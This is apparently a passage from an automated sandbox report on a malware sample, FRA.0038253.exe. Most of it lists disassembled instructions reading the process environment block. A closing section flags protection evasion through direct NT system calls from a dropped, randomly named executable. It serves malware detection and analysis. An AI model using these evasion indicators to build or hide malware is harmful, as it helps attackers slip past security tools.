        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357AD7A7 mov eax, dword ptr fs:[00000030h]3_2_357AD7A7
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357AD7A7 mov eax, dword ptr fs:[00000030h]3_2_357AD7A7
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357AD7A7 mov eax, dword ptr fs:[00000030h]3_2_357AD7A7
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35711796 mov eax, dword ptr fs:[00000030h]3_2_35711796
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35711796 mov eax, dword ptr fs:[00000030h]3_2_35711796
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357BB781 mov eax, dword ptr fs:[00000030h]3_2_357BB781
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357BB781 mov eax, dword ptr fs:[00000030h]3_2_357BB781
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3660 mov eax, dword ptr fs:[00000030h]3_2_356F3660
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3660 mov eax, dword ptr fs:[00000030h]3_2_356F3660
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3660 mov eax, dword ptr fs:[00000030h]3_2_356F3660
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D7662 mov eax, dword ptr fs:[00000030h]3_2_356D7662
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D7662 mov eax, dword ptr fs:[00000030h]3_2_356D7662
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D7662 mov eax, dword ptr fs:[00000030h]3_2_356D7662
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35775660 mov eax, dword ptr fs:[00000030h]3_2_35775660
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576166E mov eax, dword ptr fs:[00000030h]3_2_3576166E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576166E mov eax, dword ptr fs:[00000030h]3_2_3576166E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576166E mov eax, dword ptr fs:[00000030h]3_2_3576166E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35715654 mov eax, dword ptr fs:[00000030h]3_2_35715654
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DD64A mov eax, dword ptr fs:[00000030h]3_2_356DD64A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DD64A mov eax, dword ptr fs:[00000030h]3_2_356DD64A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E3640 mov eax, dword ptr fs:[00000030h]3_2_356E3640
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FF640 mov eax, dword ptr fs:[00000030h]3_2_356FF640
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FF640 mov eax, dword ptr fs:[00000030h]3_2_356FF640
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FF640 mov eax, dword ptr fs:[00000030h]3_2_356FF640
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E965A mov eax, dword ptr fs:[00000030h]3_2_356E965A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E965A mov eax, dword ptr fs:[00000030h]3_2_356E965A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E5622 mov eax, dword ptr fs:[00000030h]3_2_356E5622
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E5622 mov eax, dword ptr fs:[00000030h]3_2_356E5622
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E7623 mov eax, dword ptr fs:[00000030h]3_2_356E7623
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3571F63F mov eax, dword ptr fs:[00000030h]3_2_3571F63F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3571F63F mov eax, dword ptr fs:[00000030h]3_2_3571F63F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578D62C mov ecx, dword ptr fs:[00000030h]3_2_3578D62C
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578D62C mov ecx, dword ptr fs:[00000030h]3_2_3578D62C
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578D62C mov eax, dword ptr fs:[00000030h]3_2_3578D62C
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570D600 mov eax, dword ptr fs:[00000030h]3_2_3570D600
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570D600 mov eax, dword ptr fs:[00000030h]3_2_3570D600
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35769603 mov eax, dword ptr fs:[00000030h]3_2_35769603
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579F607 mov eax, dword ptr fs:[00000030h]3_2_3579F607
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3571360F mov eax, dword ptr fs:[00000030h]3_2_3571360F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35773608 mov eax, dword ptr fs:[00000030h]3_2_35773608
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35773608 mov eax, dword ptr fs:[00000030h]3_2_35773608
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35773608 mov eax, dword ptr fs:[00000030h]3_2_35773608
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35773608 mov eax, dword ptr fs:[00000030h]3_2_35773608
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35773608 mov eax, dword ptr fs:[00000030h]3_2_35773608
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35773608 mov eax, dword ptr fs:[00000030h]3_2_35773608
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D96E0 mov eax, dword ptr fs:[00000030h]3_2_356D96E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D96E0 mov eax, dword ptr fs:[00000030h]3_2_356D96E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E56E0 mov eax, dword ptr fs:[00000030h]3_2_356E56E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E56E0 mov eax, dword ptr fs:[00000030h]3_2_356E56E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E56E0 mov eax, dword ptr fs:[00000030h]3_2_356E56E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357756E0 mov eax, dword ptr fs:[00000030h]3_2_357756E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357756E0 mov eax, dword ptr fs:[00000030h]3_2_357756E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357836E0 mov eax, dword ptr fs:[00000030h]3_2_357836E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357836E0 mov eax, dword ptr fs:[00000030h]3_2_357836E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357836E0 mov eax, dword ptr fs:[00000030h]3_2_357836E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357836E0 mov eax, dword ptr fs:[00000030h]3_2_357836E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357836E0 mov eax, dword ptr fs:[00000030h]3_2_357836E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570D6D0 mov eax, dword ptr fs:[00000030h]3_2_3570D6D0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3575D69D mov eax, dword ptr fs:[00000030h]3_2_3575D69D
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579F68C mov eax, dword ptr fs:[00000030h]3_2_3579F68C
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3573717A mov eax, dword ptr fs:[00000030h]3_2_3573717A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3573717A mov eax, dword ptr fs:[00000030h]3_2_3573717A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3571716D mov eax, dword ptr fs:[00000030h]3_2_3571716D
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357B3157 mov eax, dword ptr fs:[00000030h]3_2_357B3157
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357B3157 mov eax, dword ptr fs:[00000030h]3_2_357B3157
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357B3157 mov eax, dword ptr fs:[00000030h]3_2_357B3157
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357B5149 mov eax, dword ptr fs:[00000030h]3_2_357B5149
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577D140 mov eax, dword ptr fs:[00000030h]3_2_3577D140
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577D140 mov eax, dword ptr fs:[00000030h]3_2_3577D140
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577314A mov eax, dword ptr fs:[00000030h]3_2_3577314A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577314A mov eax, dword ptr fs:[00000030h]3_2_3577314A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577314A mov eax, dword ptr fs:[00000030h]3_2_3577314A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577314A mov eax, dword ptr fs:[00000030h]3_2_3577314A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579F13E mov eax, dword ptr fs:[00000030h]3_2_3579F13E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35717128 mov eax, dword ptr fs:[00000030h]3_2_35717128
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35717128 mov eax, dword ptr fs:[00000030h]3_2_35717128
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E510D mov eax, dword ptr fs:[00000030h]3_2_356E510D
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570510F mov eax, dword ptr fs:[00000030h]3_2_3570510F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570510F mov eax, dword ptr fs:[00000030h]3_2_3570510F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570510F mov eax, dword ptr fs:[00000030h]3_2_3570510F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570510F mov eax, dword ptr fs:[00000030h]3_2_3570510F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570510F mov eax, dword ptr fs:[00000030h]3_2_3570510F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570510F mov eax, dword ptr fs:[00000030h]3_2_3570510F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570510F mov eax, dword ptr fs:[00000030h]3_2_3570510F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570510F mov eax, dword ptr fs:[00000030h]3_2_3570510F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570510F mov eax, dword ptr fs:[00000030h]3_2_3570510F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570510F mov eax, dword ptr fs:[00000030h]3_2_3570510F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570510F mov eax, dword ptr fs:[00000030h]3_2_3570510F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570510F mov eax, dword ptr fs:[00000030h]3_2_3570510F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570510F mov eax, dword ptr fs:[00000030h]3_2_3570510F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570F1F0 mov eax, dword ptr fs:[00000030h]3_2_3570F1F0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570F1F0 mov eax, dword ptr fs:[00000030h]3_2_3570F1F0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577D1F0 mov eax, dword ptr fs:[00000030h]3_2_3577D1F0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E91E5 mov eax, dword ptr fs:[00000030h]3_2_356E91E5
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E91E5 mov eax, dword ptr fs:[00000030h]3_2_356E91E5
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570B1E0 mov eax, dword ptr fs:[00000030h]3_2_3570B1E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570B1E0 mov eax, dword ptr fs:[00000030h]3_2_3570B1E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570B1E0 mov eax, dword ptr fs:[00000030h]3_2_3570B1E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570B1E0 mov eax, dword ptr fs:[00000030h]3_2_3570B1E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570B1E0 mov eax, dword ptr fs:[00000030h]3_2_3570B1E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570B1E0 mov eax, dword ptr fs:[00000030h]3_2_3570B1E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570B1E0 mov eax, dword ptr fs:[00000030h]3_2_3570B1E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D91F0 mov eax, dword ptr fs:[00000030h]3_2_356D91F0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D91F0 mov eax, dword ptr fs:[00000030h]3_2_356D91F0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F51C0 mov eax, dword ptr fs:[00000030h]3_2_356F51C0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F51C0 mov eax, dword ptr fs:[00000030h]3_2_356F51C0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F51C0 mov eax, dword ptr fs:[00000030h]3_2_356F51C0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F51C0 mov eax, dword ptr fs:[00000030h]3_2_356F51C0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357B51B6 mov eax, dword ptr fs:[00000030h]3_2_357B51B6
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357131BE mov eax, dword ptr fs:[00000030h]3_2_357131BE
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357131BE mov eax, dword ptr fs:[00000030h]3_2_357131BE
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35721190 mov eax, dword ptr fs:[00000030h]3_2_35721190
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35721190 mov eax, dword ptr fs:[00000030h]3_2_35721190
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35709194 mov eax, dword ptr fs:[00000030h]3_2_35709194
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35789060 mov eax, dword ptr fs:[00000030h]3_2_35789060
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E7072 mov eax, dword ptr fs:[00000030h]3_2_356E7072
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357B505B mov eax, dword ptr fs:[00000030h]3_2_357B505B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E1051 mov eax, dword ptr fs:[00000030h]3_2_356E1051
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E1051 mov eax, dword ptr fs:[00000030h]3_2_356E1051
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DD02D mov eax, dword ptr fs:[00000030h]3_2_356DD02D
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35705004 mov eax, dword ptr fs:[00000030h]3_2_35705004
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35705004 mov ecx, dword ptr fs:[00000030h]3_2_35705004
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3571D0F0 mov eax, dword ptr fs:[00000030h]3_2_3571D0F0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3571D0F0 mov ecx, dword ptr fs:[00000030h]3_2_3571D0F0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D90F8 mov eax, dword ptr fs:[00000030h]3_2_356D90F8
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D90F8 mov eax, dword ptr fs:[00000030h]3_2_356D90F8
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D90F8 mov eax, dword ptr fs:[00000030h]3_2_356D90F8
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D90F8 mov eax, dword ptr fs:[00000030h]3_2_356D90F8
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DB0D6 mov eax, dword ptr fs:[00000030h]3_2_356DB0D6
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DB0D6 mov eax, dword ptr fs:[00000030h]3_2_356DB0D6
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DB0D6 mov eax, dword ptr fs:[00000030h]3_2_356DB0D6
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DB0D6 mov eax, dword ptr fs:[00000030h]3_2_356DB0D6
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FB0D0 mov eax, dword ptr fs:[00000030h]3_2_356FB0D0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357B50B7 mov eax, dword ptr fs:[00000030h]3_2_357B50B7
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579B0AF mov eax, dword ptr fs:[00000030h]3_2_3579B0AF
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F0A5 mov eax, dword ptr fs:[00000030h]3_2_3578F0A5
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F0A5 mov eax, dword ptr fs:[00000030h]3_2_3578F0A5
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F0A5 mov eax, dword ptr fs:[00000030h]3_2_3578F0A5
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F0A5 mov eax, dword ptr fs:[00000030h]3_2_3578F0A5
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F0A5 mov eax, dword ptr fs:[00000030h]3_2_3578F0A5
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F0A5 mov eax, dword ptr fs:[00000030h]3_2_3578F0A5
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F0A5 mov eax, dword ptr fs:[00000030h]3_2_3578F0A5
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35767090 mov eax, dword ptr fs:[00000030h]3_2_35767090
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EB360 mov eax, dword ptr fs:[00000030h]3_2_356EB360
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EB360 mov eax, dword ptr fs:[00000030h]3_2_356EB360
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EB360 mov eax, dword ptr fs:[00000030h]3_2_356EB360
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EB360 mov eax, dword ptr fs:[00000030h]3_2_356EB360
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EB360 mov eax, dword ptr fs:[00000030h]3_2_356EB360
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EB360 mov eax, dword ptr fs:[00000030h]3_2_356EB360
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357B3336 mov eax, dword ptr fs:[00000030h]3_2_357B3336
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570332D mov eax, dword ptr fs:[00000030h]3_2_3570332D
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D9303 mov eax, dword ptr fs:[00000030h]3_2_356D9303
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D9303 mov eax, dword ptr fs:[00000030h]3_2_356D9303
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579F30A mov eax, dword ptr fs:[00000030h]3_2_3579F30A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576330C mov eax, dword ptr fs:[00000030h]3_2_3576330C
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576330C mov eax, dword ptr fs:[00000030h]3_2_3576330C
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576330C mov eax, dword ptr fs:[00000030h]3_2_3576330C
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576330C mov eax, dword ptr fs:[00000030h]3_2_3576330C
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357133D0 mov eax, dword ptr fs:[00000030h]3_2_357133D0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E93A6 mov eax, dword ptr fs:[00000030h]3_2_356E93A6
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E93A6 mov eax, dword ptr fs:[00000030h]3_2_356E93A6
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35781390 mov eax, dword ptr fs:[00000030h]3_2_35781390
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35781390 mov eax, dword ptr fs:[00000030h]3_2_35781390
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E1380 mov eax, dword ptr fs:[00000030h]3_2_356E1380
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E1380 mov eax, dword ptr fs:[00000030h]3_2_356E1380
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E1380 mov eax, dword ptr fs:[00000030h]3_2_356E1380
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E1380 mov eax, dword ptr fs:[00000030h]3_2_356E1380
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E1380 mov eax, dword ptr fs:[00000030h]3_2_356E1380
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FF380 mov eax, dword ptr fs:[00000030h]3_2_356FF380
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FF380 mov eax, dword ptr fs:[00000030h]3_2_356FF380
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FF380 mov eax, dword ptr fs:[00000030h]3_2_356FF380
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FF380 mov eax, dword ptr fs:[00000030h]3_2_356FF380
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FF380 mov eax, dword ptr fs:[00000030h]3_2_356FF380
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FF380 mov eax, dword ptr fs:[00000030h]3_2_356FF380
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579F38A mov eax, dword ptr fs:[00000030h]3_2_3579F38A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579D270 mov eax, dword ptr fs:[00000030h]3_2_3579D270
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577327E mov eax, dword ptr fs:[00000030h]3_2_3577327E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577327E mov eax, dword ptr fs:[00000030h]3_2_3577327E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577327E mov eax, dword ptr fs:[00000030h]3_2_3577327E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577327E mov eax, dword ptr fs:[00000030h]3_2_3577327E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577327E mov eax, dword ptr fs:[00000030h]3_2_3577327E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577327E mov eax, dword ptr fs:[00000030h]3_2_3577327E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DB273 mov eax, dword ptr fs:[00000030h]3_2_356DB273
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DB273 mov eax, dword ptr fs:[00000030h]3_2_356DB273
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DB273 mov eax, dword ptr fs:[00000030h]3_2_356DB273
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3575D250 mov eax, dword ptr fs:[00000030h]3_2_3575D250
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3575D250 mov ecx, dword ptr fs:[00000030h]3_2_3575D250

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtCreateFile: Direct from: 0x779D2F0C
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtAllocateVirtualMemory: Direct from: 0x779D3BBC
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtSetInformationThread: Direct from: 0x779C6319
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtQueryInformationToken: Direct from: 0x779D2BCC
